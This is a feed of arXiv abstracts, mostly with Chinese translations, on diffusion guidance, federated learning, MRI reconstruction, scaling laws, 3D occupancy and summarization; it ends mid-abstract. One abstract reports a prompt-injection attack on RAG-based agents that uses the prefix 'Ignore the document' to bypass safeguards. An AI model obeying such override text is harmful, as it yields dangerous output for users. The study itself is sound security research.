摘要: 使用负面提示的基于文本的对抗引导已经成为一个被广泛采用的方法,用来引导扩散模型远离产生不良概念。虽然有用,但仅使用文本进行对抗引导可能不足以捕捉复杂的视觉概念或避免特定的视觉元素,比如受版权保护的角色。在本文中,我们首次探索了在这个方向上使用另一种模态的方法,通过直接使用参考图像或批处理中的其他图像的视觉特征来进行对抗引导。我们引入了负面令牌合并(NegToMe),这是一种简单但有效的无需训练的方法,通过在反向扩散过程中有选择地推开参考图像和生成图像之间匹配的视觉特征来进行对抗引导。通过简单调整使用的参考,NegToMe能够实现各种不同的应用。值得注意的是,当将批处理中的其他图像用作参考时,我们发现NegToMe显著增强了输出的多样性(例如,种族,性别,视觉),通过将每个图像的特征从其他图像中引导远离。同样,当与受版权保护的参考图像一起使用时,NegToMe将与受版权保护内容的视觉相似性降低了34.57%。NegToMe简单易于实现,只需几行代码,仅使用略高(<4%)的推理时间,并且与不本地支持负面提示使用的不同扩散架构兼容,包括Flux等。代码可在https://negtome.github.io上找到。
更新时间: 2024-12-05 18:43:25
领域: cs.CV,cs.AI,cs.GR,cs.LG,stat.ML
FedDUAL: A Dual-Strategy with Adaptive Loss and Dynamic Aggregation for Mitigating Data Heterogeneity in Federated Learning
Federated Learning (FL) marks a transformative approach to distributed model training by combining locally optimized models from various clients into a unified global model. While FL preserves data privacy by eliminating centralized storage, it encounters significant challenges such as performance degradation, slower convergence, and reduced robustness of the global model due to the heterogeneity in client data distributions. Among the various forms of data heterogeneity, label skew emerges as a particularly formidable and prevalent issue, especially in domains such as image classification. To address these challenges, we begin with comprehensive experiments to pinpoint the underlying issues in the FL training process. Based on our findings, we then introduce an innovative dual-strategy approach designed to effectively resolve these issues. First, we introduce an adaptive loss function for client-side training, meticulously crafted to preserve previously acquired knowledge while maintaining an optimal equilibrium between local optimization and global model coherence. Secondly, we develop a dynamic aggregation strategy for aggregating client models at the server. This approach adapts to each client's unique learning patterns, effectively addressing the challenges of diverse data across the network. Our comprehensive evaluation, conducted across three diverse real-world datasets, coupled with theoretical convergence guarantees, demonstrates the superior efficacy of our method compared to several established state-of-the-art approaches.
Updated: 2024-12-05 18:42:29
标题: FedDUAL:一种具有自适应损失和动态聚合的双策略,用于减轻联邦学习中的数据异质性
摘要: 联邦学习(FL)标志着一种革命性的分布式模型训练方法,通过将来自各个客户端的本地优化模型合并成统一的全局模型。虽然FL通过消除集中式存储保护数据隐私,但由于客户端数据分布的异质性,它面临着诸如性能下降、收敛速度变慢以及全局模型稳健性降低等重大挑战。在各种数据异质性形式中,标签倾斜问题尤为严重且普遍,尤其是在图像分类等领域。为了解决这些挑战,我们首先进行全面实验以确定FL训练过程中的潜在问题。基于我们的发现,我们引入了一种创新的双策略方法,旨在有效解决这些问题。首先,我们为客户端训练引入了一种自适应损失函数,精心设计以保留先前获得的知识,同时在本地优化和全局模型协调之间保持最佳平衡。其次,我们开发了一种动态聚合策略,用于在服务器端聚合客户端模型。这种方法适应每个客户端独特的学习模式,有效解决网络中多样数据的挑战。我们在三个不同的真实世界数据集上进行了全面评估,并结合理论收敛保证,证明了我们的方法相对于几种已建立的最先进方法的卓越有效性。
更新时间: 2024-12-05 18:42:29
领域: cs.LG,cs.AI,cs.CV,cs.DC
Targeting the Core: A Simple and Effective Method to Attack RAG-based Agents via Direct LLM Manipulation
AI agents, powered by large language models (LLMs), have transformed human-computer interactions by enabling seamless, natural, and context-aware communication. While these advancements offer immense utility, they also inherit and amplify inherent safety risks such as bias, fairness, hallucinations, privacy breaches, and a lack of transparency. This paper investigates a critical vulnerability: adversarial attacks targeting the LLM core within AI agents. Specifically, we test the hypothesis that a deceptively simple adversarial prefix, such as \textit{Ignore the document}, can compel LLMs to produce dangerous or unintended outputs by bypassing their contextual safeguards. Through experimentation, we demonstrate a high attack success rate (ASR), revealing the fragility of existing LLM defenses. These findings emphasize the urgent need for robust, multi-layered security measures tailored to mitigate vulnerabilities at the LLM level and within broader agent-based architectures.
Updated: 2024-12-05 18:38:30
标题: 定位核心:通过直接的LLM操作攻击基于RAG的代理的简单有效方法
摘要: AI代理,由大型语言模型(LLMs)驱动,已通过实现无缝、自然和上下文感知的通信,改变了人机交互。虽然这些进步提供了巨大的实用性,但它们也继承并放大了固有的安全风险,如偏见、公平性、幻觉、隐私泄露和缺乏透明度。本文调查了一项关键的漏洞:针对AI代理内部的LLM核心的对抗性攻击。具体而言,我们测试了一个欺骗性简单的对抗性前缀,比如“忽略文件”,可以通过绕过其上下文保障,迫使LLMs产生危险或意外的输出的假设。通过实验,我们展示了高攻击成功率(ASR),揭示了现有LLM防御的脆弱性。这些发现强调了迫切需要针对LLM水平和更广泛的基于代理的体系结构中的漏洞定制的坚固、多层次的安全措施。
更新时间: 2024-12-05 18:38:30
领域: cs.AI
WaveletGPT: Wavelets Meet Large Language Models
Large Language Models (LLMs) have ushered in a new wave of artificial intelligence advancements impacting every scientific field and discipline. They are trained on a simple objective: to predict the next token given the previous context. We live in a world where most of the data around us, e.g., text, audio, and music, has a multi-scale structure associated with it. This paper infuses LLMs with traditional signal processing ideas, namely wavelets, during pre-training to take advantage of the structure. Without adding \textbf{any extra parameters} to a GPT-style LLM architecture, we achieve the same pre-training performance almost twice as fast in text, raw audio, and symbolic music. This is achieved by imposing a structure on intermediate embeddings. When trained for the same number of training steps, we achieve significant gains in performance, which is comparable to pre-training a larger neural architecture. Our architecture allows every next token prediction access to intermediate embeddings at different temporal resolutions in every Transformer decoder block. This work will hopefully pave the way for incorporating multi-rate signal processing ideas into traditional LLM pre-training. Further, we showcase pushing model performance by improving internal structure instead of just going after scale.
Updated: 2024-12-05 18:35:26
标题: 小波GPT:小波遇上大型语言模型
摘要: 大型语言模型(LLMs)引领了一波新的人工智能进步,影响了每一个科学领域和学科。它们被训练的一个简单目标是:在给定先前上下文的情况下预测下一个标记。我们生活在一个大部分数据具有多尺度结构的世界,例如文本、音频和音乐。本文在预训练过程中将LLMs与传统信号处理思想,即小波,在一起,以利用这种结构。在不向GPT风格的LLM架构添加任何额外参数的情况下,我们在文本、原始音频和符号音乐中实现了几乎两倍快速的预训练性能。这是通过对中间嵌入施加结构实现的。当进行相同数量的训练步骤时,我们在性能上取得了显著的增益,这与预训练更大的神经架构相媲美。我们的架构允许每个下一个标记预测在每个Transformer解码器块中以不同的时间分辨率访问中间嵌入。这项工作有望为将多速率信号处理思想纳入传统LLM预训练铺平道路。此外,我们展示了通过改善内部结构而不仅仅追求规模来提高模型性能。
更新时间: 2024-12-05 18:35:26
领域: eess.SP,cs.AI,cs.CL,cs.LG,cs.SD,eess.AS
Efficient Task Grouping Through Samplewise Optimisation Landscape Analysis
Shared training approaches, such as multi-task learning (MTL) and gradient-based meta-learning, are widely used in various machine learning applications, but they often suffer from negative transfer, leading to performance degradation in specific tasks. While several optimisation techniques have been developed to mitigate this issue for pre-selected task cohorts, identifying optimal task combinations for joint learning - known as task grouping - remains underexplored and computationally challenging due to the exponential growth in task combinations and the need for extensive training and evaluation cycles. This paper introduces an efficient task grouping framework designed to reduce these overwhelming computational demands of the existing methods. The proposed framework infers pairwise task similarities through a sample-wise optimisation landscape analysis, eliminating the need for the shared model training required to infer task similarities in existing methods. With task similarities acquired, a graph-based clustering algorithm is employed to pinpoint near-optimal task groups, providing an approximate yet efficient and effective solution to the originally NP-hard problem. Empirical assessments conducted on 8 different datasets highlight the effectiveness of the proposed framework, revealing a five-fold speed enhancement compared to previous state-of-the-art methods. Moreover, the framework consistently demonstrates comparable performance, confirming its remarkable efficiency and effectiveness in task grouping.
Updated: 2024-12-05 18:33:59
标题: 通过样本优化景观分析实现高效的任务分组
摘要: 共享训练方法,如多任务学习(MTL)和基于梯度的元学习,在各种机器学习应用中被广泛使用,但它们经常受到负迁移的影响,导致特定任务性能下降。尽管已经开发了几种优化技术来减轻预选任务组的这一问题,但对于联合学习的最佳任务组合的识别 - 即任务分组 - 由于任务组合数量的指数增长和需要大量的训练和评估周期,仍然未被充分探索和计算挑战。本文介绍了一个设计用于减少现有方法的压倒性计算需求的有效任务分组框架。所提出的框架通过样本优化景观分析推断成对任务相似性,消除了现有方法中需要共享模型训练来推断任务相似性的需求。获得任务相似性后,采用基于图的聚类算法来确定接近最佳的任务组,提供了对原始NP困难问题的近似但高效和有效的解决方案。对8个不同数据集进行的实证评估突出了所提出框架的有效性,显示与先前最先进方法相比的五倍速度增强。此外,该框架始终表现出可比较的性能,验证了其在任务分组中的显著效率和有效性。
更新时间: 2024-12-05 18:33:59
领域: cs.LG
Stabilizing and Solving Inverse Problems using Data and Machine Learning
We consider an inverse problem involving the reconstruction of the solution to a nonlinear partial differential equation (PDE) with unknown boundary conditions. Instead of direct boundary data, we are provided with a large dataset of boundary observations for typical solutions (collective data) and a bulk measurement of a specific realization. To leverage this collective data, we first compress the boundary data using proper orthogonal decomposition (POD) in a linear expansion. Next, we identify a possible nonlinear low-dimensional structure in the expansion coefficients using an auto-encoder, which provides a parametrization of the dataset in a lower-dimensional latent space. We then train a neural network to map the latent variables representing the boundary data to the solution of the PDE. Finally, we solve the inverse problem by optimizing a data-fitting term over the latent space. We analyze the underlying stabilized finite element method in the linear setting and establish optimal error estimates in the $H^1$ and $L^2$-norms. The nonlinear problem is then studied numerically, demonstrating the effectiveness of our approach.
Updated: 2024-12-05 18:31:14
标题: 使用数据和机器学习稳定化和解决反问题
摘要: 我们考虑一个涉及重建非线性偏微分方程(PDE)解的反问题,其中边界条件未知。我们不是直接拥有边界数据,而是提供了大量典型解的边界观测数据(集合数据)以及特定实现的大量测量数据。为了利用这些集合数据,我们首先使用适当的正交分解(POD)对边界数据进行压缩成线性展开。接下来,我们使用自动编码器识别展开系数中可能存在的非线性低维结构,这为数据集在较低维度的潜在空间中提供了参数化。然后,我们训练神经网络将代表边界数据的潜在变量映射到PDE解。最后,我们通过在潜在空间上优化数据拟合项来解决反问题。 我们在线性设置中对基于稳定化的有限元方法进行分析,并建立了$H^1$和$L^2$范数中的最优误差估计。然后对非线性问题进行数值研究,展示了我们方法的有效性。
更新时间: 2024-12-05 18:31:14
领域: math.NA,cs.LG,cs.NA
Providing Differential Privacy for Federated Learning Over Wireless: A Cross-layer Framework
Federated Learning (FL) is a distributed machine learning framework that inherently allows edge devices to maintain their local training data, thus providing some level of privacy. However, FL's model updates still pose a risk of privacy leakage, which must be mitigated. Over-the-air FL (OTA-FL) is an adapted FL design for wireless edge networks that leverages the natural superposition property of the wireless medium. We propose a wireless physical layer (PHY) design for OTA-FL which improves differential privacy (DP) through a decentralized, dynamic power control that utilizes both inherent Gaussian noise in the wireless channel and a cooperative jammer (CJ) for additional artificial noise generation when higher privacy levels are required. Although primarily implemented within the Upcycled-FL framework, where a resource-efficient method with first-order approximations is used at every even iteration to decrease the required information from clients, our power control strategy is applicable to any FL framework, including FedAvg and FedProx as shown in the paper. This adaptation showcases the flexibility and effectiveness of our design across different learning algorithms while maintaining a strong emphasis on privacy. Our design removes the need for client-side artificial noise injection for DP, utilizing a cooperative jammer to enhance privacy without affecting transmission efficiency for higher privacy demands. Privacy analysis is provided using the Moments Accountant method. We perform a convergence analysis for non-convex objectives to tackle heterogeneous data distributions, highlighting the inherent trade-offs between privacy and accuracy. Numerical results show that our approach with various FL algorithms outperforms the state-of-the-art under the same DP conditions on the non-i.i.d. FEMNIST dataset, and highlight the cooperative jammer's effectiveness in ensuring strict privacy.
Updated: 2024-12-05 18:27:09
标题: 为无线联合学习提供差分隐私:一个跨层框架
摘要: 联邦学习(FL)是一个分布式机器学习框架,本质上允许边缘设备保持其本地训练数据,从而提供一定程度的隐私保护。然而,FL的模型更新仍然存在隐私泄露的风险,必须加以减轻。无线覆盖FL(OTA-FL)是针对无线边缘网络的一种适应性FL设计,利用无线介质的自然叠加特性。我们提出了一种用于OTA-FL的无线物理层(PHY)设计,通过利用无线信道中固有的高斯噪声和合作干扰器(CJ)的协作来生成额外的人工噪声,从而提高差分隐私(DP)。尽管主要在Upcycled-FL框架中实现,该框架在每次偶数迭代中使用资源高效的方法进行第一阶近似,以减少来自客户端的所需信息,我们的功率控制策略适用于任何FL框架,包括FedAvg和FedProx,如论文所示。这种适应展示了我们设计在不同学习算法中的灵活性和有效性,同时强调了对隐私的重视。我们的设计消除了需要在客户端注入人工噪声以实现DP的需求,利用合作干扰器来增强隐私而不影响对高隐私需求的传输效率。隐私分析使用Moments Accountant方法。我们对非凸目标进行了收敛分析,以处理异构数据分布,突显了隐私和准确性之间固有的权衡。数值结果显示,我们的方法与各种FL算法相比,在非i.i.d. FEMNIST数据集上在相同的DP条件下表现优异,并突显了合作干扰器在确保严格隐私方面的有效性。
更新时间: 2024-12-05 18:27:09
领域: cs.IT,cs.LG,math.IT
Federated Automated Feature Engineering
Automated feature engineering (AutoFE) is used to automatically create new features from original features to improve predictive performance without needing significant human intervention and expertise. Many algorithms exist for AutoFE, but very few approaches exist for the federated learning (FL) setting where data is gathered across many clients and is not shared between clients or a central server. We introduce AutoFE algorithms for the horizontal, vertical, and hybrid FL settings, which differ in how the data is gathered across clients. To the best of our knowledge, we are the first to develop AutoFE algorithms for the horizontal and hybrid FL cases, and we show that the downstream model performance of federated AutoFE is similar to the case where data is held centrally and AutoFE is performed centrally.
Updated: 2024-12-05 18:23:44
标题: 联合自动化特征工程
摘要: 自动特征工程(AutoFE)用于自动从原始特征中创建新特征,以提高预测性能,无需大量人为干预和专业知识。存在许多用于AutoFE的算法,但在联邦学习(FL)设置中很少有方法存在,数据跨多个客户端收集,并且数据不在客户端或中央服务器之间共享。我们引入了适用于水平、垂直和混合FL设置的AutoFE算法,这些算法在数据跨客户端收集的方式上有所不同。据我们所知,我们是第一个为水平和混合FL情况开发AutoFE算法的团队,并且我们展示了联邦AutoFE的下游模型性能与数据集中保存数据并在中央位置执行AutoFE时类似的情况。
更新时间: 2024-12-05 18:23:44
领域: cs.LG,cs.DC
Establishing Task Scaling Laws via Compute-Efficient Model Ladders
We develop task scaling laws and model ladders to predict the individual task performance of pretrained language models (LMs) in the overtrained setting. Standard power laws for language modeling loss cannot accurately model task performance. Therefore, we leverage a two-step prediction approach: first use model and data size to predict a task-specific loss, and then use this task loss to predict task performance. We train a set of small-scale "ladder" models, collect data points to fit the parameterized functions of the two prediction steps, and make predictions for two target models: a 7B model trained to 4T tokens and a 13B model trained to 5T tokens. Training the ladder models only costs 1% of the compute used for the target models. On four multiple-choice tasks written in ranked classification format, we can predict the accuracy of both target models within 2 points of absolute error. We have higher prediction error on four other tasks (average absolute error 6.9) and find that these are often tasks with higher variance in task metrics. We also find that using less compute to train fewer ladder models tends to deteriorate predictions. Finally, we empirically show that our design choices and the two-step approach lead to superior performance in establishing scaling laws.
Updated: 2024-12-05 18:21:49
标题: 建立通过计算高效的模型梯级实现任务缩放定律
摘要: 我们开发了任务缩放定律和模型梯子,以预测预训练语言模型(LMs)在过度训练设置中的个别任务性能。标准的语言建模损失幂律不能准确地建模任务性能。因此,我们利用了一个两步预测方法:首先使用模型和数据大小来预测特定任务的损失,然后使用这个任务损失来预测任务性能。我们训练了一组小规模的“梯子”模型,收集数据点以拟合两个预测步骤的参数化函数,并为两个目标模型进行预测:一个训练到4T令牌的7B模型和一个训练到5T令牌的13B模型。训练梯子模型只需要目标模型使用的计算量的1%。在四个以排名分类格式编写的多项选择任务中,我们可以在绝对误差2点内预测两个目标模型的准确性。我们对另外四项任务的预测误差较高(平均绝对误差为6.9),发现这些任务通常具有更高的任务指标方差。我们还发现,使用更少的计算资源来训练更少的梯子模型往往会导致预测结果恶化。最后,我们凭经验证明,我们的设计选择和两步方法在建立缩放定律方面表现出卓越性能。
更新时间: 2024-12-05 18:21:49
领域: cs.CL,cs.AI
Learning to Reconstruct Accelerated MRI Through K-space Cold Diffusion without Noise
Deep learning-based MRI reconstruction models have achieved superior performance these days. Most recently, diffusion models have shown remarkable performance in image generation, in-painting, super-resolution, image editing and more. As a generalized diffusion model, cold diffusion further broadens the scope and considers models built around arbitrary image transformations such as blurring, down-sampling, etc. In this paper, we propose a k-space cold diffusion model that performs image degradation and restoration in k-space without the need for Gaussian noise. We provide comparisons with multiple deep learning-based MRI reconstruction models and perform tests on a well-known large open-source MRI dataset. Our results show that this novel way of performing degradation can generate high-quality reconstruction images for accelerated MRI.
Updated: 2024-12-05 18:16:10
标题: 学习通过K空间冷扩散无噪声重建加速MRI
摘要: 基于深度学习的MRI重建模型近年来取得了出色的性能。最近,扩散模型在图像生成、修复、超分辨率、图像编辑等方面表现出了显著的性能。作为一种广义扩散模型,冷扩散进一步拓宽了范围,考虑了围绕任意图像变换构建的模型,如模糊、下采样等。本文提出了一个在k空间中执行图像退化和恢复的k空间冷扩散模型,无需高斯噪声。我们与多个基于深度学习的MRI重建模型进行比较,并在一个知名的大型开源MRI数据集上进行测试。我们的结果表明,这种新颖的退化方法可以为加速MRI生成高质量的重建图像。
更新时间: 2024-12-05 18:16:10
领域: eess.IV,cs.CV,cs.LG,physics.med-ph
Regularization by Neural Style Transfer for MRI Field-Transfer Reconstruction with Limited Data
Recent advances in MRI reconstruction have achieved remarkable success with deep learning-based models. However, most methods depend on large-scale, task-specific datasets, leaving reconstruction in data-limited settings as a critical but underexplored challenge. Regularization by denoising (RED) is a general pipeline that incorporates a denoiser as a prior for image reconstruction, showing promising results in various image processing tasks, including denoising, deblurring, and super-resolution. In this work, we propose a regularization by neural style transfer (RNST) method to further leverage the priors from the neural transfer and denoising engine. RNST effectively reconstructs high-quality images from noisy, low-quality inputs across varying image styles, even with limited data. We validate RNST on clinical MRI scans, demonstrating its ability to significantly improve image quality. These findings underline the potential of RNST for MRI field-transfer reconstruction and its promise in addressing reconstruction tasks in data-constrained scenarios.
Updated: 2024-12-05 18:07:33
标题: 通过神经风格转移进行MRI场转移重建的正则化(有限数据)
摘要: MRI重建的近期进展取得了显著成功,其中基于深度学习的模型起到了关键作用。然而,大多数方法依赖于大规模、特定任务的数据集,这导致在数据有限的情况下重建成为一个重要但尚未充分探索的挑战。正则化通过去噪(RED)是一个通用的流程,它将去噪器作为图像重建的先验,在各种图像处理任务中展现出了很好的效果,包括去噪、去模糊和超分辨率。在这项工作中,我们提出了一种通过神经风格迁移(RNST)方法来进一步利用神经风格迁移和去噪引擎的先验。RNST能够有效地从嘈杂、低质量的输入中重建出高质量的图像,即使数据有限也能跨不同的图像风格。我们在临床MRI扫描上验证了RNST,证明了它显著改善图像质量的能力。这些发现强调了RNST在MRI领域转移重建中的潜力,以及它在应对数据受限情况下的重建任务中的前景。
更新时间: 2024-12-05 18:07:33
领域: cs.CV,cs.LG,physics.med-ph
Asynchronous Batch Bayesian Optimization with Pipelining Evaluations for Experimental Resource$\unicode{x2013}$constrained Conditions
Bayesian optimization is efficient even with a small amount of data and is used in engineering and in science, including biology and chemistry. In Bayesian optimization, a parameterized model with an uncertainty is fitted to explain the experimental data, and then the model suggests parameters that would most likely improve the results. Batch Bayesian optimization reduces the processing time of optimization by parallelizing experiments. However, batch Bayesian optimization cannot be applied if the number of parallelized experiments is limited by the cost or scarcity of equipment; in such cases, sequential methods require an unrealistic amount of time. In this study, we developed pipelining Bayesian optimization (PipeBO) to reduce the processing time of optimization even with a limited number of parallel experiments. PipeBO was inspired by the pipelining of central processing unit architecture, which divides computational tasks into multiple processes. PipeBO was designed to achieve experiment parallelization by overlapping various processes of the experiments. PipeBO uses the results of completed experiments to update the parameters of running parallelized experiments. Using the Black-Box Optimization Benchmarking, which consists of 24 benchmark functions, we compared PipeBO with the sequential Bayesian optimization methods. PipeBO reduced the average processing time of optimization to about 56% for the experiments that consisted of two processes or even less for those with more processes for 20 out of the 24 functions. Overall, PipeBO parallelizes Bayesian optimization in the resource-constrained settings so that efficient optimization can be achieved.
Updated: 2024-12-05 18:06:09
标题: 异步批量贝叶斯优化在实验资源受限条件下进行流水线评估
摘要: 贝叶斯优化即使在数据量很少的情况下也是高效的,并且被应用于工程和科学领域,包括生物学和化学。在贝叶斯优化中,一个带有不确定性的参数化模型被拟合以解释实验数据,然后模型建议可能会改善结果的参数。批量贝叶斯优化通过并行化实验来减少优化的处理时间。然而,如果并行实验的数量受到成本或设备稀缺性的限制,批量贝叶斯优化就无法应用;在这种情况下,顺序方法需要不切实际的时间。在这项研究中,我们开发了管道贝叶斯优化(PipeBO),即使只有有限数量的并行实验,也可以减少优化的处理时间。PipeBO受到中央处理单元架构的管道化启发,将计算任务分为多个进程。PipeBO旨在通过重叠实验的各个过程来实现实验并行化。PipeBO使用已完成实验的结果来更新正在运行的并行实验的参数。我们使用包含24个基准函数的黑盒优化基准测试来比较PipeBO和顺序贝叶斯优化方法。对于其中20个函数中由两个或更多进程组成的实验,PipeBO将优化的平均处理时间减少约56%。总的来说,PipeBO在资源受限的情况下实现贝叶斯优化的并行化,从而实现高效的优化。
更新时间: 2024-12-05 18:06:09
领域: cs.LG
Probabilistic Gaussian Superposition for Efficient 3D Occupancy Prediction
3D semantic occupancy prediction is an important task for robust vision-centric autonomous driving, which predicts fine-grained geometry and semantics of the surrounding scene. Most existing methods leverage dense grid-based scene representations, overlooking the spatial sparsity of the driving scenes. Although 3D semantic Gaussian serves as an object-centric sparse alternative, most of the Gaussians still describe the empty region with low efficiency. To address this, we propose a probabilistic Gaussian superposition model which interprets each Gaussian as a probability distribution of its neighborhood being occupied and conforms to probabilistic multiplication to derive the overall geometry. Furthermore, we adopt the exact Gaussian mixture model for semantics calculation to avoid unnecessary overlapping of Gaussians. To effectively initialize Gaussians in non-empty region, we design a distribution-based initialization module which learns the pixel-aligned occupancy distribution instead of the depth of surfaces. We conduct extensive experiments on nuScenes and KITTI-360 datasets and our GaussianFormer-2 achieves state-of-the-art performance with high efficiency. Code: https://github.com/huang-yh/GaussianFormer.
Updated: 2024-12-05 17:59:58
标题: 概率高斯叠加用于高效的3D占据预测
摘要: 3D语义占用预测是强大的以视觉为中心的自动驾驶的重要任务,它预测周围场景的细粒度几何和语义。大多数现有方法利用密集的基于网格的场景表示,忽略了驾驶场景的空间稀疏性。虽然3D语义高斯可作为以对象为中心的稀疏替代方案,但大多数高斯仍以低效率描述空白区域。为了解决这个问题,我们提出了一个概率高斯叠加模型,将每个高斯解释为其邻域被占用的概率分布,并符合概率乘法以推导整体几何。此外,我们采用精确的高斯混合模型进行语义计算,避免高斯之间的不必要重叠。为了有效地初始化非空区域中的高斯,我们设计了一个基于分布的初始化模块,该模块学习像素对齐的占用分布而不是表面深度。我们在nuScenes和KITTI-360数据集上进行了大量实验,我们的GaussianFormer-2以高效率实现了最先进的性能。源代码:https://github.com/huang-yh/GaussianFormer。
更新时间: 2024-12-05 17:59:58
领域: cs.CV,cs.AI,cs.LG
EmbodiedOcc: Embodied 3D Occupancy Prediction for Vision-based Online Scene Understanding
3D occupancy prediction provides a comprehensive description of the surrounding scenes and has become an essential task for 3D perception. Most existing methods focus on offline perception from one or a few views and cannot be applied to embodied agents which demands to gradually perceive the scene through progressive embodied exploration. In this paper, we formulate an embodied 3D occupancy prediction task to target this practical scenario and propose a Gaussian-based EmbodiedOcc framework to accomplish it. We initialize the global scene with uniform 3D semantic Gaussians and progressively update local regions observed by the embodied agent. For each update, we extract semantic and structural features from the observed image and efficiently incorporate them via deformable cross-attention to refine the regional Gaussians. Finally, we employ Gaussian-to-voxel splatting to obtain the global 3D occupancy from the updated 3D Gaussians. Our EmbodiedOcc assumes an unknown (i.e., uniformly distributed) environment and maintains an explicit global memory of it with 3D Gaussians. It gradually gains knowledge through local refinement of regional Gaussians, which is consistent with how humans understand new scenes through embodied exploration. We reorganize an EmbodiedOcc-ScanNet benchmark based on local annotations to facilitate the evaluation of the embodied 3D occupancy prediction task. Experiments demonstrate that our EmbodiedOcc outperforms existing local prediction methods and accomplishes the embodied occupancy prediction with high accuracy and strong expandability. Our code is available at: https://github.com/YkiWu/EmbodiedOcc.
Updated: 2024-12-05 17:57:09
标题: "EmbodiedOcc: 基于视觉的在线场景理解的三维体验占据预测"
摘要: 3D占据预测提供了对周围场景的综合描述,并已成为3D感知的重要任务。大多数现有方法侧重于从一个或少数视图进行离线感知,无法应用于需要通过逐步实体探索逐渐感知场景的实体代理。在本文中,我们制定了一项实体3D占据预测任务,以应对这种实际情况,并提出了基于高斯的EmbodiedOcc框架来完成这项任务。我们使用均匀的3D语义高斯对全局场景进行初始化,并逐步更新实体代理观察到的局部区域。对于每次更新,我们从观察到的图像中提取语义和结构特征,并通过可变形的交叉注意力有效地将它们合并到精炼的区域高斯中。最后,我们采用高斯到体素的喷射技术从更新后的3D高斯中获得全局3D占据情况。我们的EmbodiedOcc假设一个未知的(即均匀分布的)环境,并使用3D高斯维护其明确的全局记忆。它通过对区域高斯的局部精炼逐渐获取知识,这与人类通过实体探索理解新场景的方式是一致的。我们重新组织了一个基于局部注释的EmbodiedOcc-ScanNet基准,以促进对实体3D占据预测任务的评估。实验证明,我们的EmbodiedOcc优于现有的本地预测方法,并以高准确性和强扩展性完成了实体占据预测。我们的代码可在以下网址获得:https://github.com/YkiWu/EmbodiedOcc。
更新时间: 2024-12-05 17:57:09
领域: cs.CV,cs.AI,cs.LG
Discriminative Fine-tuning of LVLMs
Contrastively-trained Vision-Language Models (VLMs) like CLIP have become the de facto approach for discriminative vision-language representation learning. However, these models have limited language understanding, often exhibiting a "bag of words" behavior. At the same time, Large Vision-Language Models (LVLMs), which combine vision encoders with LLMs, have been shown capable of detailed vision-language reasoning, yet their autoregressive nature renders them less suitable for discriminative tasks. In this work, we propose to combine "the best of both worlds": a new training approach for discriminative fine-tuning of LVLMs that results in strong discriminative and compositional capabilities. Essentially, our approach converts a generative LVLM into a discriminative one, unlocking its capability for powerful image-text discrimination combined with enhanced language understanding. Our contributions include: (1) A carefully designed training/optimization framework that utilizes image-text pairs of variable length and granularity for training the model with both contrastive and next-token prediction losses. This is accompanied by ablation studies that justify the necessity of our framework's components. (2) A parameter-efficient adaptation method using a combination of soft prompting and LoRA adapters. (3) Significant improvements over state-of-the-art CLIP-like models of similar size, including standard image-text retrieval benchmarks and notable gains in compositionality.
Updated: 2024-12-05 17:54:27
标题: LVLMs的判别微调
摘要: 对比训练的视觉-语言模型(VLMs)如CLIP已成为区分性视觉-语言表示学习的事实方法。然而,这些模型在语言理解方面存在限制,通常表现出“词袋”行为。与此同时,将视觉编码器与LLMs相结合的大型视觉-语言模型(LVLMs)已被证明能够进行详细的视觉-语言推理,但它们的自回归特性使其不太适合区分性任务。 在这项工作中,我们提出结合“两全其美”的方法:一种新的LVLM区分性微调训练方法,结果表现出强大的区分性和构成能力。基本上,我们的方法将生成式LVLM转换为区分式LVLM,释放其强大的图像-文本识别能力,同时增强语言理解能力。 我们的贡献包括:(1)一个精心设计的训练/优化框架,利用可变长度和粒度的图像-文本对来训练模型,同时使用对比和下一个标记预测损失。这伴随着解释我们框架组件必要性的消融研究。(2)一种使用软提示和LoRA适配器相结合的参数高效适应方法。(3)与同等大小的最先进的类似CLIP模型相比,包括标准图像-文本检索基准和构成性方面的显著改进。
更新时间: 2024-12-05 17:54:27
领域: cs.CV,cs.AI
A Hitchhiker's Guide to Understanding Performances of Two-Class Classifiers
Properly understanding the performances of classifiers is essential in various scenarios. However, the literature often relies only on one or two standard scores to compare classifiers, which fails to capture the nuances of application-specific requirements, potentially leading to suboptimal classifier selection. Recently, a paper on the foundations of the theory of performance-based ranking introduced a tool, called the Tile, that organizes an infinity of ranking scores into a 2D map. Thanks to the Tile, it is now possible to evaluate and compare classifiers efficiently, displaying all possible application-specific preferences instead of having to rely on a pair of scores. In this paper, we provide a first hitchhiker's guide for understanding the performances of two-class classifiers by presenting four scenarios, each showcasing a different user profile: a theoretical analyst, a method designer, a benchmarker, and an application developer. Particularly, we show that we can provide different interpretative flavors that are adapted to the user's needs by mapping different values on the Tile. As an illustration, we leverage the newly introduced Tile tool and the different flavors to rank and analyze the performances of 74 state-of-the-art semantic segmentation models in two-class classification through the eyes of the four user profiles. Through these user profiles, we demonstrate that the Tile effectively captures the behavior of classifiers in a single visualization, while accommodating an infinite number of ranking scores.
Updated: 2024-12-05 17:52:35
标题: 《搭便车者的指南:理解双类分类器的性能》
摘要: 正确理解分类器的性能在各种场景中至关重要。然而,文献往往只依赖于一个或两个标准分数来比较分类器,这未能捕捉特定应用要求的微妙差别,可能导致次优的分类器选择。最近,一篇关于基于性能的排名理论基础的论文引入了一种工具,称为“Tile”,将无限数量的排名分数组织成一个二维地图。通过Tile,现在可以高效地评估和比较分类器,显示所有可能的应用特定偏好,而不必依赖一对分数。在本文中,我们提供了一个第一本理解两类分类器性能的指南,通过展示四个场景,每个展示一个不同的用户配置文件:理论分析员、方法设计者、基准测试者和应用开发者。特别地,我们展示通过在Tile上映射不同数值,我们可以提供适应用户需求的不同解释风格。作为示范,我们利用新引入的Tile工具和不同的风味来排名和分析74种最先进的语义分割模型在两类分类中的性能,从四个用户配置文件的角度来看。通过这些用户配置文件,我们展示Tile有效地捕捉了分类器的行为在单个可视化中,同时容纳了无限数量的排名分数。
更新时间: 2024-12-05 17:52:35
领域: cs.CV,cs.LG,cs.PF
CNNSum: Exploring Long-Conext Summarization with Large Language Models in Chinese Novels
Large Language Models (LLMs) have been well-researched in many long-context tasks. However, due to high annotation costs, high-quality long-context summary datasets for training or evaluation are scarce, limiting further research. In this work, we introduce CNNSum, a new multi-scale Chinese long-context novel summarization benchmark, including four subsets, length covering 16k\textasciitilde128k, 695 samples in total, the annotations are human-driven. We evaluate commercial and open-source models on CNNSum and conduct a detailed analysis. Based on the observations, we further conduct fine-tuning exploration with short-context summary data. In our study: (1) GPT-4o underperformed, due to excessive subjective commentary. (2) Currently, long-context summarization mainly relies on memory ability, small LLMs with stable longer context lengths are the most cost-effective. Using long data concatenated from short-context summaries makes a significant improvement. (3) Prompt templates may cause a large performance gap but can be 